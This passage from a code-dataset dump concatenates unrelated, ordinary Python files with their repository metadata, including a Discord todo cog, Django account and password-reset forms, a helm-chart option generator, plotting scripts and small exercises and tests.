raise ImportError("Could not import module '{}': {}".format(conf_mod, e))
# Overwrite upper keys
for setting in dir(mod):
if setting == setting.upper():
locals()[setting] = getattr(mod, setting)
# ========================================================================================
# FLASK-SQLALCHEMY
# ========================================================================================
DATABASE = DATABASES['default']
if DATABASE['ENGINE'] == 'sqlite':
SQLALCHEMY_DATABASE_URI = 'sqlite:///{NAME}'.format(**DATABASE)
else:
# SQLALCHEMY_DATABASE_URI = 'mysql+mysqldb://{USER}:{PASSWORD}@{HOST}:{PORT}/{NAME}'.format(**DATABASE)
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://{USER}:{PASSWORD}@{HOST}:{PORT}/{NAME}'.format(**DATABASE)
| 39.641026 | 107 | 0.493532 | 144 | 1,546 | 5.097222 | 0.4375 | 0.040872 | 0.085831 | 0.070845 | 0.103542 | 0.103542 | 0.103542 | 0 | 0 | 0 | 0 | 0.000756 | 0.144243 | 1,546 | 38 | 108 | 40.684211 | 0.554044 | 0.50194 | 0 | 0 | 0 | 0 | 0.213423 | 0.103356 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.0625 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
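The settings row copies only UPPERCASE attributes from the env-specific module into the current namespace. A self-contained sketch of that override loop (the stand-in module is built with `types.SimpleNamespace` purely for illustration):

```python
from types import SimpleNamespace

DEBUG = False
DB_NAME = "default.sqlite"

# Stand-in for the env-specific settings module that gets imported.
mod = SimpleNamespace(DEBUG=True, DB_NAME="prod.sqlite", _helper="ignored")

for setting in dir(mod):
    if setting == setting.upper():  # only UPPERCASE names count as settings
        globals()[setting] = getattr(mod, setting)

print(DEBUG, DB_NAME)  # -> True prod.sqlite
```

The original uses `locals()`, which at module level refers to the same dict as `globals()`; the sketch uses `globals()` to make that explicit.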
104022f80f0cfe30ed3aab519ac4eeadac303cfa | 867 | py | Python | INBa/2015/ZORIN_D_I/task_4_7.py | YukkaSarasti/pythonintask | eadf4245abb65f4400a3bae30a4256b4658e009c | [
"Apache-2.0"
] | null | null | null | INBa/2015/ZORIN_D_I/task_4_7.py | YukkaSarasti/pythonintask | eadf4245abb65f4400a3bae30a4256b4658e009c | [
"Apache-2.0"
] | null | null | null | INBa/2015/ZORIN_D_I/task_4_7.py | YukkaSarasti/pythonintask | eadf4245abb65f4400a3bae30a4256b4658e009c | [
"Apache-2.0"
] | null | null | null | # Task 4. Variant 7.
# Write a program that prints the name under which Maria Luisa Ceciarelli is better known. Additionally, print that person's area of interest, place of birth, years of birth and death (if the person has died), and compute the age at the current moment (or at the moment of death). Variables must be used to store all the required data. After printing the information, the program must wait for the user to press Enter before exiting.
# Zorin D.I.
# 11.04.2016
name = "Maria Luisa Ceciarelli"
birthplace = "Rome, Italy"
date1 = 1931
date2 = 2016
age = date2 - date1
interest = "Film industry"
print(name + " - best known as Monica Vitti, an Italian actress")
print("Place of birth: " + birthplace)
print("Year of birth: ", date1)
print("Age: ", age)
print("Area of interest: " + interest)
input("\n\nPress ENTER to exit")
| 43.35 | 443 | 0.7797 | 111 | 867 | 6.09009 | 0.747748 | 0.029586 | 0.059172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030667 | 0.134948 | 867 | 19 | 444 | 45.631579 | 0.870667 | 0.558247 | 0 | 0 | 0 | 0 | 0.497355 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.416667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
10402fdf566c301bcd9dcb713ba61afdb6b551f7 | 676 | py | Python | backend/api/models/request.py | haroldadmin/transportation-analytics-platform | 366891dc422d3a72287b3224fbf5b0daf3d14751 | [
"Apache-2.0"
] | null | null | null | backend/api/models/request.py | haroldadmin/transportation-analytics-platform | 366891dc422d3a72287b3224fbf5b0daf3d14751 | [
"Apache-2.0"
] | null | null | null | backend/api/models/request.py | haroldadmin/transportation-analytics-platform | 366891dc422d3a72287b3224fbf5b0daf3d14751 | [
"Apache-2.0"
] | null | null | null | from flask_restplus import fields, Model
def add_models_to_namespace(namespace):
namespace.models[route_request_model.name] = route_request_model
route_request_model = Model("Represents a Route Request", {
"id": fields.Integer(description="Unique identifier for the ride"),
"start_point_lat": fields.Float(description="Represents the latitude of the starting point"),
"start_point_long": fields.Float(description="Represents the longitude of the starting point"),
"end_point_lat": fields.Float(description="Represents the latitude of the ending point"),
"end_point_long": fields.Float(description="Represents the longitude of the ending point")
})
| 45.066667 | 99 | 0.778107 | 90 | 676 | 5.644444 | 0.388889 | 0.094488 | 0.173228 | 0.251969 | 0.448819 | 0.448819 | 0.448819 | 0.448819 | 0.448819 | 0.448819 | 0 | 0 | 0.12426 | 676 | 14 | 100 | 48.285714 | 0.858108 | 0 | 0 | 0 | 0 | 0 | 0.434911 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1047517a8fc519c2245e3ae4ac28ca41f0c16f09 | 7,928 | py | Python | todo/commands/complete.py | Kuro-Rui/JojoCogs | 57b86694e29462c5f5b561bc4a060ed04cfb8deb | [
"MIT"
] | null | null | null | todo/commands/complete.py | Kuro-Rui/JojoCogs | 57b86694e29462c5f5b561bc4a060ed04cfb8deb | [
"MIT"
] | null | null | null | todo/commands/complete.py | Kuro-Rui/JojoCogs | 57b86694e29462c5f5b561bc4a060ed04cfb8deb | [
"MIT"
] | null | null | null | # Copyright (c) 2021 - Jojo#7791
# Licensed under MIT
import asyncio
from contextlib import suppress
from typing import List
import discord
from redbot.core import commands
from redbot.core.utils.chat_formatting import pagify
from redbot.core.utils.predicates import MessagePredicate
from ..abc import TodoMixin
from ..utils import PositiveInt, ViewTodo
from ..utils.formatting import _format_completed
__all__ = ["Complete"]
class Complete(TodoMixin):
"""Commands that have to do with completed todos"""
_no_completed_message: str = "You do not have any completed todos. You can add one with `{prefix}todo complete <indexes...>`"
@commands.group()
async def todo(self, *args):
pass
@todo.group(invoke_without_command=True, require_var_positional=True, aliases=["c"])
async def complete(self, ctx: commands.Context, *indexes: PositiveInt(False)): # type:ignore
"""Commands having to do with your completed tasks
**Arguments**
- `indexes` Optional indexes to complete. If left at none the help command will be shown
"""
indexes = [i - 1 for i in indexes] # type:ignore
data = await self.cache.get_user_data(ctx.author.id)
todos = data["todos"]
if not todos:
return await ctx.send(self._no_todo_message.format(prefix=ctx.clean_prefix))
completed = []
for index in indexes:
try:
completed.append((todos.pop(index))["task"])
except IndexError:
pass
except Exception as e:
self.log.error("Error in command 'todo complete'", exc_info=e)
amount = len(completed)
if amount == 0:
return await ctx.send(
"Hm, somehow I wasn't able to complete those todos. Please make sure that the inputted indexes are valid"
)
plural = "" if amount == 1 else "s"
msg = f"Completed {amount} todo{plural}."
if data["user_settings"]["extra_details"]:
msg += "\n" + "\n".join(f"`{task}`" for task in completed)
task = None
if len(msg) <= 2000:
await ctx.send(msg)
else:
task = self.bot.loop.create_task(ctx.send_interactive(pagify(msg)))
data["completed"].extend(completed)
data["todos"] = todos
await self.cache.set_user_data(ctx.author, data)
await self.cache._maybe_autosort(ctx.author)
if task is not None and not task.done():
await task
@complete.command(
name="delete", aliases=["del", "remove", "clear"], require_var_positional=True
)
async def complete_delete(self, ctx: commands.Context, *indexes: PositiveInt):
"""Delete completed todos
This will remove them from your completed list
**Arguments**
- `indexes` A list of integers for the indexes of your completed todos
"""
indexes: List[int] = [i - 1 for i in indexes] # type:ignore
indexes.sort(reverse=True) # type:ignore
completed = await self.cache.get_user_item(ctx.author, "completed")
if not completed:
return await ctx.send(self._no_completed_message.format(prefix=ctx.clean_prefix))
for index in indexes:
try:
completed.pop(index)
except IndexError:
pass
except Exception as e:
self.log.error("Exception in command 'todo complete delete'", exc_info=e)
amount = len(indexes)
if amount == 0:
return await ctx.send(
"Hm, somehow I wasn't able to delete those todos. Please make sure that the inputted indexes are valid"
)
plural = "" if amount == 1 else "s"
await ctx.send(f"Deleted {amount} completed todo{plural}")
await self.cache.set_user_item(ctx.author, "completed", completed)
@complete.command(name="deleteall", aliases=["delall", "removeall", "clearall"])
async def complete_remove_all(self, ctx: commands.Context, confirm: bool = False):
"""Remove all of your completed todos
**Arguments**
- `confirm` Skips the confirmation check. Defaults to False
"""
if not confirm:
msg = await ctx.send(
"Are you sure you would like to remove all of your completed todos? (y/N)"
)
pred = MessagePredicate.yes_or_no(ctx)
            umsg = None
            try:
                # A timeout value is an assumption here; without one, wait_for
                # never raises asyncio.TimeoutError and the except branch is dead code.
                umsg = await self.bot.wait_for("message", check=pred, timeout=30.0)
            except asyncio.TimeoutError:
                pass
            finally:
                with suppress(discord.NotFound, discord.Forbidden):
                    await msg.delete()
                    if umsg is not None:  # umsg stays None if wait_for timed out
                        await umsg.add_reaction("\N{WHITE HEAVY CHECK MARK}")
if not pred.result:
return await ctx.send("Okay, I will not remove your completed todos.")
await self.cache.set_user_item(ctx.author, "completed", [])
await ctx.send("Done. Removed all of your completed todos.")
@complete.command(name="list")
async def complete_list(self, ctx: commands.Context):
"""List your completed todos
This will only list if you have completed todos
"""
data = await self.cache.get_user_data(ctx.author.id)
completed = data["completed"]
if not completed:
return await ctx.send(self._no_completed_message.format(prefix=ctx.clean_prefix))
settings = data["user_settings"]
completed = await _format_completed(completed, False, **settings)
await self.page_logic(ctx, completed, f"{ctx.author.name}'s Completed Todos", **settings)
@complete.command(name="reorder", aliases=["move"], usage="<from> <to>")
async def complete_reorder(
self, ctx: commands.Context, original: PositiveInt, new: PositiveInt
):
"""Move a completed todo from one index to another
This will error if the index is larger than your completed todo list
**Arguments**
- `from` The index of the completed todo
- `to` The new index of the completed todo
"""
if original == new:
return await ctx.send("You cannot move a todo from one index... to the same index")
completed = await self.cache.get_user_item(ctx.author, "completed")
if not completed:
return await ctx.send(self._no_completed_message.format(prefix=ctx.clean_prefix))
act_orig = original - 1
act_new = new - 1
try:
task = completed.pop(act_orig)
except IndexError:
return await ctx.send(f"I could not find a completed todo at index `{original}`")
completed.insert(act_new, task)
msg = f"Moved a completed todo from {original} to {new}"
await ctx.send(msg)
await self.cache.set_user_setting(ctx.author, "autosorting", False)
await self.cache.set_user_item(ctx.author, "completed", completed)
@complete.command(name="view")
async def complete_view(self, ctx: commands.Context, index: PositiveInt(False)): # type:ignore
"""View a completed todo. This has a similar effect to using `[p]todo <index>`
This will have a menu that will allow you to delete the todo
**Arguments**
- `index` The index of the todo you want to view.
"""
actual_index = index - 1
data = await self.cache.get_user_data(ctx.author.id)
completed = data["completed"]
settings = data["user_settings"]
if not completed:
return await ctx.send(self._no_completed_message.format(prefix=ctx.clean_prefix))
try:
todo = completed[actual_index]
except IndexError:
return await ctx.send("That index was invalid")
await ViewTodo(index, self.cache, todo, completed=True, **settings).start(ctx)
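The `complete_delete` command above sorts `indexes` in reverse before popping. A minimal standalone sketch (with illustrative values only) of why descending order matters:

```python
# Popping highest-first keeps the remaining indexes valid; popping in
# ascending order would shift later elements and remove the wrong ones.
items = ["a", "b", "c", "d"]
for i in sorted([0, 2], reverse=True):
    items.pop(i)
print(items)  # ['b', 'd']
```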
# File: magicmethod__str__.py (repo: maahi07m/OOPS, license: MIT)
class ComplexNumber:
# TODO: write your code here
def __init__(self,real=0, imag=0):
self.real_part = real
self.imaginary_part = imag
def __str__(self):
return f"{self.real_part}{self.imaginary_part:+}i"
if __name__ == "__main__":
import json
input_args = list(json.loads(input()))
complex_number = ComplexNumber(*input_args)
complex_number_str_value = str(complex_number)
print(complex_number_str_value)
'''
[1,2]
1+2i
'''
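The `[1,2] → 1+2i` example above works because of the `+` flag in the format spec used by `__str__`; a standalone sketch of that behavior:

```python
# "{:+}" forces an explicit sign, so a negative imaginary part renders as
# "3-4i" without any manual if/else on the sign.
print(f"{1}{2:+}i")   # 1+2i
print(f"{3}{-4:+}i")  # 3-4i
```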
# File: get_color_wordcloud.py (repo: Joe606/scrape_sportshoes, license: MIT)
# -*- coding: utf-8 -*-
import pymysql
import time
import os
import matplotlib.pyplot as plt
print(os.getcwd())
db = pymysql.connect(
host='localhost',
user='root',
passwd='xxxx',
    database='男运动鞋'  # DB name: "men's sports shoes" (identifier kept as-is)
)
cur = db.cursor()
cur.execute('select productSize from all_comments;')
all_size = cur.fetchall()
size = list()
for i in all_size:
j = int(i[0])
size.append(j)
print(size)
x = range(1,len(size)+1)
y = size
plt.figure()
plt.scatter(x,y,c='green')
plt.title('distribution about size of shoes')
plt.xlabel('man',color='b')
plt.ylabel('size of shoes',color='r')
plt.annotate('size',(1,42))
plt.legend('point')
plt.savefig('size.jpg')  # save before show(); after show() the figure may be blank
plt.show()
import wordcloud
import jieba
cur.execute('select productColor from all_comments;')
all_color = cur.fetchall()
color = str()
for i in all_color:
j = i[0]
color = color +','+ j
print(type(color),color.count('/'))
color = color.replace('/',',')
print(color)
#mytext = ''.join(jieba.cut(color))
#print(mytext)
wc = wordcloud.WordCloud(
collocations=False,
font_path='simfang.ttf',
background_color='black',
max_words=5000,
max_font_size=300,
width=1200,
height=600,
margin=2,
)
wc = wc.generate(text=color)
plt.imshow(wc)
plt.axis('off')
plt.show()
wc.to_file('wordcloud.png')
si = str()
for i in size:
si = si + ',' + str(i)
si = si + ',' + 'black'
print(si)
print(type(si))
wc2 = wordcloud.WordCloud(collocations=False).generate(si)
plt.imshow(wc2)
plt.show()
wc2.to_file('wc2.jpg')
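The loops above build comma-separated strings by repeated concatenation, which leaves a leading comma. An equivalent `str.join` form (a sketch, not a drop-in replacement, since it drops that leading comma):

```python
# Join stringified sizes once instead of concatenating in a loop.
sizes = [41, 42, 43]
si = ",".join(str(s) for s in sizes) + ",black"
print(si)  # 41,42,43,black
```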
#!/bin/python
# File: hack/generateChartOptions.py (repo: deissnerk/external-dns-management, license: Apache-2.0)
# should be started from project base directory
# helper script to regenerate helm chart file: partial of charts/external-dns-management/templates/deployment.yaml
import re
import os
helpFilename = "/tmp/dns-controller-manager-help.txt"
rc = os.system("make build-local && ./dns-controller-manager --help | grep ' --' > {}".format(helpFilename))
if rc != 0:
exit(rc)
f = open(helpFilename,"r")
options = f.read()
os.remove(helpFilename)
def toCamelCase(name):
str = ''.join(x.capitalize() for x in re.split("[.-]", name))
str = str[0].lower() + str[1:]
str = str.replace("alicloudDns", "alicloudDNS")
str = str.replace("azureDns", "azureDNS")
str = str.replace("googleClouddns", "googleCloudDNS")
str = str.replace("ingressDns", "ingressDNS")
str = str.replace("serviceDns", "serviceDNS")
str = str.replace("cloudflareDns", "cloudflareDNS")
str = str.replace("infobloxDns", "infobloxDNS")
return str
excluded = {"name", "help", "identifier", "dry-run"}
excludedPattern = [re.compile(".*cache-dir$"), re.compile(".*blocked-zone$"), re.compile(".*remote-access-.+")]
def isExcluded(name):
if name == "" or name in excluded:
return True
for prog in excludedPattern:
if prog.match(name):
return True
return False
for line in options.split("\n"):
m = re.match(r"\s+(?:-[^-]+)?--(\S+)\s", line)
if m:
name = m.group(1)
if not isExcluded(name):
camelCase = toCamelCase(name)
txt = """ {{- if .Values.configuration.%s }}
- --%s={{ .Values.configuration.%s }}
{{- end }}""" % (camelCase, name, camelCase)
print(txt)
defaultValues = {
"controllers": "all",
"persistentCache": "false",
"persistentCacheStorageSize": "1Gi",
"persistentCacheStorageSizeAlicloud": "20Gi",
"serverPortHttp": "8080",
"ttl": 120,
}
print("configuration:")
for line in options.split("\n"):
m = re.match(r"\s+(?:-[^-]+)?--(\S+)\s", line)
if m:
name = m.group(1)
if not isExcluded(name):
camelCase = toCamelCase(name)
if camelCase in defaultValues:
txt = " %s: %s" % (camelCase, defaultValues[camelCase])
else:
txt = "# %s:" % camelCase
print(txt)
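The split/capitalize step of `toCamelCase` above (before the DNS-specific replacements) can be checked in isolation; this sketch restates just that step under a different name to avoid shadowing the `str` builtin:

```python
import re

def to_camel_case(name):
    # Split on "." and "-", capitalize each part, then lowercase the first char.
    parts = re.split("[.-]", name)
    joined = "".join(p.capitalize() for p in parts)
    return joined[0].lower() + joined[1:]

print(to_camel_case("persistent-cache.storage-size"))  # persistentCacheStorageSize
```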
# File: test.py (repo: ttran1904/MDP, license: MIT)
from MDP import MDP
import unittest
class MDPTestCase(unittest.TestCase):
def test_small1(self):
lst = [['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd']]
self.__printInput(lst)
mdp = MDP(lst)
mdp.run()
# Get the result Transition Probabilities (dictionary)
tp = mdp.getTransitionProbs()
self.__printOutput(tp)
solution = {'a': {'b': 1}, 'b': {'c':1}, 'c' : {'d': 1}}
self.assertEqual(tp, solution)
def test_small2(self):
seq1 = ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd']
seq2 = ['a', 'b', 'b', 'a', 'a', 'd', 'd', 'b', 'b', 'c', 'a']
lst = [seq1, seq2]
self.__printInput(lst)
mdp = MDP(lst)
mdp.run()
# Get the result Transition Probabilities (dictionary)
tp = mdp.getTransitionProbs()
self.__printOutput(tp)
solution = {'a': {'b': 2/3, 'd': 1/3}, 'b': {'c': 2/3, 'a': 1/3},
'c': {'d': 1/2, 'a': 1/2}, 'd': {'b': 1}}
self.assertEqual(tp, solution)
def __printInput(self, lst):
# Uncomment HERE to see input
# print("\n......Input: ", lst)
pass
def __printOutput(self, o):
# Uncomment HERE to see output
# print(".....Output:", o)
pass
if __name__ == '__main__':
    unittest.main()
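The expected solutions in the tests above imply how `MDP.getTransitionProbs()` counts: self-transitions are dropped and the remaining bigram counts are normalized per source state. A hand-rolled sketch of that counting (the `MDP` internals are not shown here, so this is an inference from the expected values):

```python
from collections import Counter, defaultdict

def transition_probs(sequences):
    # Count non-self bigrams per source state, then normalize per state.
    counts = defaultdict(Counter)
    for seq in sequences:
        for cur, nxt in zip(seq, seq[1:]):
            if cur != nxt:  # self-loops (a -> a) are excluded
                counts[cur][nxt] += 1
    return {s: {t: c / sum(nxts.values()) for t, c in nxts.items()}
            for s, nxts in counts.items()}

tp = transition_probs([["a", "a", "b", "b", "c", "c", "d", "d"]])
print(tp)  # {'a': {'b': 1.0}, 'b': {'c': 1.0}, 'c': {'d': 1.0}}
```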
# File: apps/purchases/migrations/0009_auto_20200502_0253.py (repo: jorgesaw/kstore, license: MIT)
# Generated by Django 2.2.10 on 2020-05-02 05:53
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('purchases', '0008_auto_20200430_1617'),
]
operations = [
migrations.RenameField(
model_name='itempurchase',
old_name='supplier_price',
new_name='price',
),
]
# File: pylayers/antprop/examples/ex_meta.py (repo: usmanwardag/pylayers, license: MIT)
from pylayers.gis.layout import *
from pylayers.antprop.signature import *
from pylayers.antprop.channel import *
import pylayers.signal.waveform as wvf
import networkx as nx
import numpy as np
import time
import logging
L = Layout('WHERE1_clean.ini')
#L = Layout('defstr2.ini')
try:
L.dumpr()
except:
L.build()
L.dumpw()
#L.build()
#L.dumpw()
#L.buildGi()
nc1 = 6#5
nc2 = 25#37
poly1 = L.Gt.node[nc1]['polyg']
cp1 = poly1.centroid.xy
poly2 = L.Gt.node[nc2]['polyg']
cp2 = poly2.centroid.xy
ptx = np.array([cp1[0][0],cp1[1][0],1.5])
prx = np.array([cp2[0][0]+0.5,cp2[1][0]+0.5,1.5])
print(ptx)
print(prx)
d = np.sqrt(np.dot((ptx-prx),(ptx-prx)))
tau = d/0.3
print(d, tau)
logging.info('Signature')
S = Signatures(L,nc1,nc2)
a =time.time()
logging.info('Calculate signature')
#S.run2(cutoff=6,dcut=3)
S.run(cutoff=2)
b=time.time()
print(b - a)
for i in L.Gi.nodes():
ei = eval(i)
if type(ei)!= int:
if ei[0] == 354:
            print(i)
#Gsi.add_node('Tx')
#Gsi.pos['Tx']=tuple(ptx[:2])
#for i in L.Gt.node[nc1]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge('Tx',i)
#Gsi.add_node('Rx')
#Gsi.pos['Rx']=tuple(prx[:2])
#for i in L.Gt.node[nc2]['inter']:
# if i in Gsi.nodes():
# Gsi.add_edge(i,'Rx')
#print 'signatures'
#co = nx.dijkstra_path_length(Gsi,'Tx','Rx')
#sig=list(nx.all_simple_paths(Gsi,'Tx','Rx',cutoff=co+2))
#b=time.time()
#print b-a
#f,ax=L.showG('t')
#nx.draw(Gsi,Gsi.pos,ax=ax)
#plt.show()
##S.run(L,metasig,cutoff=3)
#print "r = S.rays "
r = S.rays(ptx,prx)
print("r3 = r.to3D ")
r3 = r.to3D()
print("r3.locbas ")
r3.locbas(L)
#print "r3.fillinter "
r3.fillinter(L)
r3.show(L)
plt.show()
##
#config = ConfigParser.ConfigParser()
#_filesimul = 'default.ini'
#filesimul = pyu.getlong(_filesimul, "ini")
#config.read(filesimul)
#fGHz = np.linspace(eval(config.get("frequency", "fghzmin")),
# eval(config.get("frequency", "fghzmax")),
# eval(config.get("frequency", "nf")))
#
#Cn=r3.eval(fGHz)
#
#Cn.freq=Cn.fGHz
#sco=Cn.prop2tran(a='theta',b='theta')
#wav = wvf.Waveform()
#ciro = sco.applywavB(wav.sfg)
#
##raynumber = 4
#
##fig=plt.figure('Cpp')
##f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
#
##r3d.info(raynumber)
## plt.show()
##
##
##
###
###c11 = r3d.Ctilde[:,:,0,0]
###c12 = r3d.Ctilde[:,:,0,1]
###c21 = r3d.Ctilde[:,:,1,0]
###c22 = r3d.Ctilde[:,:,1,1]
###
###
###
###Cn=Ctilde()
###Cn.Cpp = bs.FUsignal(r3d.I.f, c11)
###Cn.Ctp = bs.FUsignal(r3d.I.f, c12)
###Cn.Cpt = bs.FUsignal(r3d.I.f, c21)
###Cn.Ctt = bs.FUsignal(r3d.I.f, c22)
###Cn.nfreq = r3d.I.nf
###Cn.nray = r3d.nray
###Cn.tauk=r3d.delays
###
###raynumber = 4
###
###fig=plt.figure('Cpp')
###f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber])))
###
##
##
##
##
##
##
# File: pydemic/data/__init__.py (repo: uiuc-covid19-modeling/pydemic, license: MIT)
__copyright__ = """
Copyright (C) 2020 George N Wong
Copyright (C) 2020 Zachary J Weiner
"""
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import pandas as pd
__doc__ = """
Currently, two simple parsers are implemented to collect United States data.
More parsers can be added straightforwardly by subclassing
:class:`pydemic.data.DataParser`.
.. automodule:: pydemic.data.united_states
"""
def camel_to_snake(name):
import re
name = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', name).lower()
class DataParser:
data_url = None
date_column = 'date'
region_column = 'region'
translation = {}
def translate_columns(self, key):
_key = camel_to_snake(key)
return self.translation.get(_key, _key)
def __call__(self, region=None):
df = pd.read_csv(self.data_url, parse_dates=[self.date_column],
index_col=[self.region_column, self.date_column])
df = df.drop(columns=set(self.translation.values()) & set(df.columns))
df = df.rename(columns=self.translate_columns)
if region is not None:
df = df.sort_index().loc[region]
return df
__all__ = [
"camel_to_snake",
"DataParser",
]
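The `camel_to_snake` helper above can be exercised on its own; the column names here are hypothetical examples, not ones the parsers necessarily emit:

```python
import re

def camel_to_snake(name):
    # Insert underscores at case boundaries, then lowercase everything.
    name = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", name)
    return re.sub("([a-z0-9])([A-Z])", r"\1_\2", name).lower()

print(camel_to_snake("positiveTests"))  # positive_tests
print(camel_to_snake("ICUBeds"))       # icu_beds
```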
# File: accounts/forms.py (repo: GDGSNF/My-Business, license: MIT)
import datetime
import re
from configparser import ConfigParser
from smtplib import SMTPException
from django import forms
from django.conf import settings
from django.contrib.auth import authenticate, login
from django.contrib.auth.tokens import default_token_generator
from django.core.mail import send_mail
from django.core.mail.backends.smtp import EmailBackend
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes
from django.utils.html import strip_tags
from django.utils.http import urlsafe_base64_encode
from accounts.models import Account, Shift
class LoginForm(forms.Form):
email = forms.EmailField(label="Email")
password = forms.CharField(
label="Password", widget=forms.PasswordInput(render_value=False)
)
def clean_email(self):
return self.cleaned_data["email"].lower()
def clean(self):
if self._errors:
return
self.account = authenticate(
email=self.cleaned_data["email"], password=self.cleaned_data["password"]
)
if self.account is None:
raise forms.ValidationError(
"The email and/or password you entered are incorrect."
)
return self.cleaned_data
def login(self, request):
if self.is_valid():
login(request, self.account)
return True
return False
class PasswordResetForm(forms.Form):
email = forms.EmailField(label="Email")
def clean_email(self):
try:
self.account = Account.objects.get(email=self.cleaned_data["email"].lower())
except Account.DoesNotExist:
raise forms.ValidationError(
"The email is not associated with any accounts."
)
return self.cleaned_data["email"].lower()
def save(self, request):
url = request.build_absolute_uri("/accounts/password/reset/")
url += urlsafe_base64_encode(force_bytes(self.account.uid)) + "/"
url += default_token_generator.make_token(self.account) + "/"
html = render_to_string(
"email.html",
{
"url": url,
"message": "You requested a password reset.",
"button": "Reset Password",
},
)
text = strip_tags(html).replace("Reset Password", url)
config = ConfigParser(interpolation=None)
config.read(settings.CONFIG_FILE)
backend = EmailBackend(
host=config.get("email", "EMAIL_HOST"),
port=config.getint("email", "EMAIL_PORT"),
username=config.get("email", "EMAIL_USER"),
password=config.get("email", "EMAIL_PASSWORD"),
use_tls=config.getboolean("email", "EMAIL_USE_TLS"),
)
try:
send_mail(
subject="Reset Password | Business Tracker",
message=text,
html_message=html,
from_email=config.get("email", "EMAIL_USER"),
recipient_list=(self.cleaned_data["email"],),
connection=backend,
)
except SMTPException:
return False
return True
class PasswordResetConfirmForm(forms.Form):
new_password = forms.CharField(
label="New Password", widget=forms.PasswordInput(render_value=False)
)
verify_new_password = forms.CharField(
label="Verify New Password", widget=forms.PasswordInput(render_value=False)
)
def clean_new_password(self):
if not re.match(settings.PASSWORD_REGEX, self.cleaned_data["new_password"]):
raise forms.ValidationError(
"The password needs to have at least 8 characters, a letter, and a number."
)
return self.cleaned_data["new_password"]
def clean(self):
if self._errors:
return
if (
self.cleaned_data["new_password"]
!= self.cleaned_data["verify_new_password"]
):
raise forms.ValidationError("The passwords do not match.")
return self.cleaned_data
def save(self, account):
account.set_password(self.cleaned_data["new_password"])
account.save()
return account
class PasswordChangeForm(forms.Form):
new_password = forms.CharField(
label="New Password", widget=forms.PasswordInput(render_value=False)
)
verify_new_password = forms.CharField(
label="Verify New Password", widget=forms.PasswordInput(render_value=False)
)
def clean_new_password(self):
if not re.match(settings.PASSWORD_REGEX, self.cleaned_data["new_password"]):
raise forms.ValidationError(
"The password needs to have at least 8 characters, a letter, and a number."
)
return self.cleaned_data["new_password"]
def clean(self):
if self._errors:
return
if (
self.cleaned_data["new_password"]
!= self.cleaned_data["verify_new_password"]
):
raise forms.ValidationError("The passwords do not match.")
return self.cleaned_data
def save(self, account):
account.set_password(self.cleaned_data["new_password"])
account.save()
return account
class AccountForm(forms.ModelForm):
verify_email = forms.EmailField(label="Verify Email")
class Meta:
model = Account
exclude = ("last_login", "password", "is_superuser")
labels = {
"first_name": "First Name",
"last_name": "Last Name",
"address1": "Address Line 1",
"address2": "Address Line 2",
"state": "State / Region / Province",
"zipcode": "ZIP / Postal Code",
}
def clean_email(self):
return self.cleaned_data["email"].lower()
def clean_verify_email(self):
return self.cleaned_data["verify_email"].lower()
def clean_first_name(self):
if not re.match(settings.NAME_REGEX, self.cleaned_data["first_name"]):
raise forms.ValidationError("Enter a valid first name.")
return self.cleaned_data["first_name"]
def clean_last_name(self):
if not re.match(settings.NAME_REGEX, self.cleaned_data["last_name"]):
raise forms.ValidationError("Enter a valid last name.")
return self.cleaned_data["last_name"]
def clean(self):
self.cleaned_data = super().clean()
if self._errors:
return
if self.cleaned_data["email"] != self.cleaned_data["verify_email"]:
raise forms.ValidationError("The emails do not match.")
return self.cleaned_data
def save(self, request=None):
account = super().save(commit=False)
if not account._state.adding:
account.save()
return account
account.is_superuser = False
account.save()
url = request.build_absolute_uri("/accounts/password/reset/")
url += urlsafe_base64_encode(force_bytes(account.uid)) + "/"
